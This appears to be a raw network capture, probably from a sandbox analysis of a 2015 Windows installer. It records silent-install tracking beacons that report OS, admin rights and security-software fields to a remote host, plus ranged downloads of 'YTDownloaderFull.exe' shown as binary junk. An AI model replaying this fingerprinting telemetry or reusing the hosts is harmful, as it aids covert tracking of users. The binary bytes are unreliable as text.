a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695306&procruntime=8&rnd=1441695314 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: xIbyFGDqLxtGTRdRaSCN6ugbqWHiiefMpKB/jUcwOVcyj9cRoyhSQp0n2DabtwEB

x-amz-request-id: 312F68C9539C77A9

Date: Tue, 08 Sep 2015 06:55:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:11 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: xIbyFG
DqLxtGTRdRaSCN6ugbqWHiiefMpKB/jUcwOVcyj9cRoyhSQp0n2DabtwEB..x-amz-requ
est-id: 312F68C9539C77A9..Date: Tue, 08 Sep 2015 06:55:11 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:11 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1441695314 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: SOtgA/T317QpC7E435rldYjvgVFVEy5T196u6iXPghASDpFNjG2 l/2frodBgOGb

x-amz-request-id: FC1C89036405D9CF

Date: Tue, 08 Sep 2015 06:55:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1441695315 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Ik9HJLtyYUZFaOfZCf5mp0/WXHgWiUKN23suOdox/6KUAbBBOFkbPfYMLjK83q5F

x-amz-request-id: CCBE09E1A865A2DF

Date: Tue, 08 Sep 2015 06:55:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Ik9HJL
tyYUZFaOfZCf5mp0/WXHgWiUKN23suOdox/6KUAbBBOFkbPfYMLjK83q5F..x-amz-requ
est-id: CCBE09E1A865A2DF..Date: Tue, 08 Sep 2015 06:55:12 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1441695316 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: cmNLPM cu34XzrgFrr fkXBw5c0FrgM6YnosWxyf12vXsEpeqyR5XlfbEX7DoZzq

x-amz-request-id: A0E1B7E1B30BCCFB

Date: Tue, 08 Sep 2015 06:55:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: cmNLPM
 cu34XzrgFrr fkXBw5c0FrgM6YnosWxyf12vXsEpeqyR5XlfbEX7DoZzq..x-amz-requ
est-id: A0E1B7E1B30BCCFB..Date: Tue, 08 Sep 2015 06:55:14 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: UTvtZ1dMPXZQX1dTtTSPGur9LKiANYnMI7N0iuAPPI3KQBxeJ07y9Bp5NHozYGRf

x-amz-request-id: 33BB82F8DC02F79D

Date: Tue, 08 Sep 2015 06:55:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: msMIhW JkN/o8anK7kjQxO7zb1d7F3cYtz62U9l5WwJrabmX6kXXJ9cC8lvfBW70

x-amz-request-id: CAD3724188BD721C

Date: Tue, 08 Sep 2015 06:55:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Hzcs/TY TnmrLYxrtR8AaINKURLLKg21OQnbPiA AFnzb4V3NpAyaHQzpKOsClyQ

x-amz-request-id: 02945F9DDB14DEF3

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Hzcs/T
Y TnmrLYxrtR8AaINKURLLKg21OQnbPiA AFnzb4V3NpAyaHQzpKOsClyQ..x-amz-requ
est-id: 02945F9DDB14DEF3..Date: Tue, 08 Sep 2015 06:55:15 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2:  HWDGSMQB1/GvCBR7vvxcSv PRpbw4w FYnnsPEm7sr2oGjwCh/cMkjMXbTwIUTD

x-amz-request-id: 5EB9124B5EB04495

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 99Cob8NtmiSaNBUB4CZvo6kdxsw9ghgo0ErCHXIGGjayX SBDHhQx6m2UWpsNcjE

x-amz-request-id: F77061BB82B11B6D

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: XGAjFUnwtoD9036n9Xq/VMXlh2MUShOjnuOzhvLZaEm 3Z1zixrdj5beEK10NwFx

x-amz-request-id: 2B156D19F5E4C112

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: KTxgwdxrFIvWHSkrSuSLVu78dsqdAWCTPGAM6X/xtCJnu5qusFjqRH 9iNsN4xfi

x-amz-request-id: 7A6E19B3CEE95DD0

Date: Tue, 08 Sep 2015 06:55:16 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: lN7oV7vyoKS32qT5VM9dVpIzBV5guQG1iMgUfZChA/HGFnEFGBH0IveXLZxIMgL8

x-amz-request-id: 40F5766B7559027A

Date: Tue, 08 Sep 2015 06:55:16 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: lN7oV7
vyoKS32qT5VM9dVpIzBV5guQG1iMgUfZChA/HGFnEFGBH0IveXLZxIMgL8..x-amz-requ
est-id: 40F5766B7559027A..Date: Tue, 08 Sep 2015 06:55:16 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1441695320 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2:  gYTdrnV6/bOvKEcyx I9xOTJnqR2LrRQOSfR145mgSbRIhZjvspBSKro8px2rZ8

x-amz-request-id: F21C1ABF7CF652D4

Date: Tue, 08 Sep 2015 06:55:17 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2:  gYTdr
nV6/bOvKEcyx I9xOTJnqR2LrRQOSfR145mgSbRIhZjvspBSKro8px2rZ8..x-amz-requ
est-id: F21C1ABF7CF652D4..Date: Tue, 08 Sep 2015 06:55:17 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1441695320 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: ZZoqyEcXu9sQU QJueKDYeBfNp73plTt8w09o2c8SJ7Ij R2zGeKbGfezhn4Xk Z

x-amz-request-id: 68F718CA6C4B23BD

Date: Tue, 08 Sep 2015 06:55:18 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ZZoqyE
cXu9sQU QJueKDYeBfNp73plTt8w09o2c8SJ7Ij R2zGeKbGfezhn4Xk Z..x-amz-requ
est-id: 68F718CA6C4B23BD..Date: Tue, 08 Sep 2015 06:55:18 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..

GET /10464.ashx?e=N6dOqWm8Q97B 4EkIHdGPx9yD62njunZnvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYrUQ6Ty4y6Z R17X6dr7mUHWLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywG9b6mGOXRvU0PhvbfFCU5wZTviae3ZnOVQACmRxohL60BydAkNdgE315w3Deozjj VIgqrRR2hR0ybeGoyy0n/LTq3A5G0uD18dH0Dqne6k4zRLhdZdA1ySsz132oq8QKl4smjsDD39XRMVonhwTGQslZILdvQr54KSj0MjI2wAOfoRc4uCBkkbXj3l9p/R2FEpGUjaW8I9mY6rRsdtpLLQEpALS37pEwSIjyzpPyoezIqinufhL42iQ/B6B zkMckDtmZsgeoC4ODCFenjplP7OKerZvQn6FdevRVLuSh76 wRWAdkKOHpVpzwoowpD52/GDNr9om /EiQVMjk1ciSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:24 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:24 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /10464.ashx?e=j7YMo/n29XPkTjH401c/dBqxh0QeCQ8TtwaYA5cXz7 JSpJdq6tfQOrVyaMS1AoBVcsZgjOTLBgfrMymJYVnXsm9xQXHrEEufJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgOXZ eJ1Vkp3MI41K2f6iZFP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:28 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:17 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 0-249999/7202264
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:18 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 750000-999999/7202264
.....T .K...f.....|...Q...<..3..V..5O...bY$..vor..YH.T....M..>L.
R.>.-.........P...lKU.....@..=t..E.......g...1...X.......S...E.XU..
.cj.....:=4..>F. GE..L..s..P.....n.V.....Y. e..iL....K.1.!.0.......
..F4Uvy...k/.g._.......&N....Q..o8|).....,'....T..-....>A..P.)Gq...
...7.%......x..;...z..Y..U.....i.H.(.y.T..R........$R-uB.....<.F..n
...B...#ka....J.>....20(..^B..|?...w.....8.....!isS..f..d}..)..<
....UX7.....>...F.N.....0N/-..*...[Z..a.3.1B.c\..A|......*...!.....
.......)...[......g...A...7.#w......F.?.I..o3...1k..?....E`r........T.
....l..D...e...KWVf.B...`[email protected][;.d\..T/.........dz.-.!.We.o....
"....T...&)W.S....-..95|..l.0...Y..T.......Zft.'....Gs.35.).|..Qpd..UC
...GLu#.bz.fBL.......K<[email protected].._..%...o.lt..l.
(.zU..i.!.AB}.._<...v..#<O.2...#.I........~....q8...[yF...:S.n/a
......G.h.[|.....vx.B.......5..u....!.XI1..0.g.x.o.....P.....j.......}
.c2.......r.yot/.$...n.........o._......F..KI...o...).a.A.K".8.....z.K
..6.XC?Bzo.z...%~.>.E..o.[...|..b....}..[...nN..R......,..U..}%...u
.a...}d...c._p.wG..A../..fUH{Qdf....l=...0....T...c....D..l..hX..s....
%...........6.v...............).....$....(2.(,..dB0Y?i.........!.H..5.
dZo....tP...?......K..8.._.q...eF9Ui....=..d.@C..../...(!...YAD8...z.I
[email protected]<...Q....{...Q...}.-.>....^.....yU?..'..m....l..)...._o...
'Y.f.......CE....Y..V...-9.....w........x.t......*dgMuo...gV....U.D|..
.)....G....../^..w.J..>..._.K.Tc.t->.......f.Y..).4....)..i.Q\.6
X.....!u{.-........$.>.u....vT.>(8.7...-..2#.....;j.)..ee.\.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:22 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1250000-1499999/7202264
 ......?.e.9.kR.."../.e\.m.-!5.y.2....A.....q2.J..t0..'....}i...%.k...
..x.S..^...........P..Y.RM4...y...&. ..G.w=E..S(b1..!.....Mz.. ..Pknk8
4..........tj.z`.......NF..X.F...L8.C.,,~.S.7. t..p@B.(........z..6...
.D]..sj.Xr..^6_.d....f.a2-"zO.....'~.)....Lw.....z}.\.7.....;f...N=^..
.`Y.^<.gD.........J.. .z....$....2..q...m.c_.....m...%.R...f.P.`...
...-..7pI.3.j.RI...M;..v.#..2.2.5Z9. .k.>.<..(v.y.bT.WC.hR|.....
..}W..i...f~h..Wo.......[.f..._.kxJFa..J1X_^1.....f..<.%*."K.hPL...
......zN...N...Q.G..T3...M..;...}.H...Ykk.....s....5..QE.r.p.....Z%o7x
...;....}q.>d..%_Y.Tg.H...=Zg(......i...)A.M=..H....sju.]..EP.[...p
......`.0..A.....(.....`.q%w....2..h[....s4....}....fY.L.=.:...C.3....
]..3......:>.......n)w.........([email protected] .).&9r...WJ.e..P...y"."..8.v.!
.!2_..&R..h..$....L.0....W........T.n......../3k...C....[.~w}mh..SQ]&.
[email protected].. ;...q..AA.F....(...N..X[.f.Q.......#..~....f
gP.\>>H .&..!..^.Zf..............|.`[email protected].?.0.V.....;]../...
.3..W,e.>.....-...g..?b.... ..r.t...#0.&.A.........s.B-.N.._......e
..m".].j...............<......L.z.L....r..a.xU......L.</..j....(
.....{X".(.e..1p.G6.(L.2...a......~.s....U.....Mx.p.b...l.g.r..H."!xGf
.*=..EX.}.p}z.R.)ft?.j......(..*............s......2.K.z.(.4GV.. /.3/v
m.....3.m......M4m.|b...,H....7..|O..-..H..l...g.q.f.".......B`.3K.\.q
.........'...h.}S].*b.....p...>l...\.5.y...]..4.=....m.....y.eQ..Y7
.|.{r@'D8^}..<.....;z...8..p.Z..1....................).P......:....
y....=s..*../.../...v..q._q...U?.L...R.9...l......S!eg.....\)W.{~.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:22 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1750000-1999999/7202264
d.....X6.b5.7.Kp.}_...;..._Me [...\.....'..R..'....Y......\o...@...:OT
n......D...L...].C& x...t............?.y1.7.^...>..b..k..&........7
xD.....)l.....>..|.Qm./....u..../{E.:..=^.L.P.....)16P...3"\Rw.....
...7.g.../...h?."...._(.........S.Q.[...6c....e....s..~&.._]Ww.../hb..
..|.}...F....."..d..........7.k....0.9Oy6.U[.*....... ..ZI. 7..p.$..z[
0.V..d.y.....8..G.~.plYQ.)4....... ..D.)'....}..IZ7..........6.O..?...
.%..%5|%S.........g.....l......M{.w.T..Ro<5.(7FM.yd.H..Mx..#e.27[..
.8F.....uN}!.P.-..y"...O.-X{........\....xsr......&.v|....Z.....{.....
Vz.j....j.MW..X..).o.t..>_.K:..-7mm...5.g.[............_4*..{..O.dv
Y."2.x.......e ..9./o.#...&.5$.v;..l....AH."[email protected].@,.=..?
<...f..Vj#..I.<.......~.-{.I......Z.....H..*C..)4&.vm...d...~{..
...K>L...%B...2v..]..R...............S.....*[email protected]...........
.Y.......0.........Ul.%dWY..OxG...WK...iQ..`..]`[email protected].
#I.3K...(.>..Y.v.N..x.... 8.F...<,.. .R.....Q..).1Nf..3.1M..XH.z
....a..?..K...N]?....R.-..X..i.z.>O=K.....Q#Z..n"....p....2.."...3.
v..#.../.J..xH.r''.X.z#.X.a9m.7=.....C9.3.Ba.E........I._.... Z..U.e..
>. bM...Ia...M.....XZS.T<...k....)....S.T~..p8........_.ud..u$.-
<m....#"cq....w.`.s...H..k). u\..O..]>.........o6R1n .._W.R..V.j
...I]Y&..t.G,5..........-......n....r...O.%..[.#.)b.Q....ZW2~n...xK.wm
.27..s...#.....K7n.......... ...E. h,.S.R`y..U>$.:............s..cV
.....>5.q............b..g.Z....R...^.;.....4.\c.&..i..Q.Y.X.zK..4r_
..{.M.x..y. ....n..U.^....>F....%.....Y..JF.v.oj..O......N..G..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:22 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2250000-2499999/7202264
,#... .....W.F.u.2I..&...&Z..K..9.j.......\=.b.....Ao...R.2}..~.....0.
 cR-...(.(....9u..k....0i.v}..(.c/(.0.a1aS.......5....r,..=...((...l m
..t..2...H...g......L....9/pE..[.".....*dh5UL.....H.&c..m?v..F.5L...&g
t;./..Vp.<..A.Cs...<.R........:.....s...7...R...J...rv.V.CT.....
.v.T.lf.o.d..t..1b7.c...J...f5.b..~..Z.....d. -.)}.?B.J8.*.....feZ....
